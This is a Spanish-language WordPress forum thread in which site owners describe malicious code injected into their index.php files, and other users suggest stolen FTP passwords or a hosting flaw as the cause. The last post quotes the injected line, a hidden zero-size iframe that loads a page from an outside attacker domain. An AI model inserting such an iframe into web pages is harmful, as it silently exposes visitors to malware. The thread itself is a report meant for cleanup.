Ataque de código malicioso al index.php

Inicio Foros WordPress General WordPress.org Ataque de código malicioso al index.php

Este debate contiene 4 respuestas, tiene 3 mensajes y lo actualizó  ramon6200 hace 8 años, 6 meses.

  • Autor
    Publicaciones
  • #17550

    guardafaro
    Participante

    <p>Este lunes al abrir mi blog El guardián del faro, me encontré con el siguiente mensaje de error de PHP:</p>
    <p>Parse error: syntax error, unexpected ‘?’ in /home/rutaxxx/rutaxxx/index.php on line 18</p>
    <p>Revisé el archivo index.php de la instalación de WP y, efectivamente, en la última línea (18) que cierra el php se encontraba incrustado el siguiente código:</p>
    <p>

    </p>
    <p>Una vez eliminada y subido el archivo volví a recuperar mi blog.<br />
    El sitio web indicado en esa URL está marcado como un sitio atacante.<br />
    Tengo dudas razonables de que hayan podido violentar algunas de mis claves, particularmente del FTP, porque suelo usar claves fuertes.<br />
    Sin embargo, ya he cambiado todas las claves por otras, y remozado el archivo wp-config.php que antes solo tenía la secret-key, colocando ahora las cuatro llaves actuales.</p>
    <p>No logro entender lo que ese código pretendían, pues mi blog no es de una particular relevancia. Mi interrogante es ¿cómo lograron colocar ese código malicioso en mi archivo index.php de WP? Porque si no sé como lo hicieron dificilmente puedo tapar brechas y evitar que ocurra.</p>
    <p>¿Alguien tiene idea de cómo pudieron hacerlo y de cómo evitarlo?
    </p>

  • #42501

    davidlluna
    Participante

    Si tienes la ultima versión de WordPress y ningún plugin “raro” lo más probable es que sea por FTP, aunque como se vió hace algún tiempo algunas configuraciones de hosting eran vulnerables

    Saludos!

  • #42523

    guardafaro
    Participante

    Sí, no lo mencioné, pero tengo la última versión de WP y no he añadido ningún plugin. Todos los que tengo llevan mucho tiempo.
    Gracias Lluna

  • #42528

    davidlluna
    Participante

    Entonces te quedan 2, que te robaran las claves de FTP ( o bien por fuerza bruta ) o que el setup del hosting tenga un fallo.

    Saludos!

  • #42542

    ramon6200
    Participante

    Hola a todos. Yo también he recibido este ataque. En concreto, alguien ha añadido en las páginas index.htm y index.php después de la etiqeta <body> esta linea:<iframe src=”http://vsmd.kz/td/index.php” width=”0″ height=”0″ frameborder=”0″></iframe>
    He podido comprobar que esta linea de código no está en mi código fuente. En google ya lo tienen localizado. Para solucionarlo, usar el mismo método que guardafaro.
    Podeis ver la info recopilada por google en: http://www.google.com/safebrowsing/diagnostic?site=http://vsmd.kz/td/index.php&hl=es

El foro ‘General WordPress.org’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest

Ir al contenido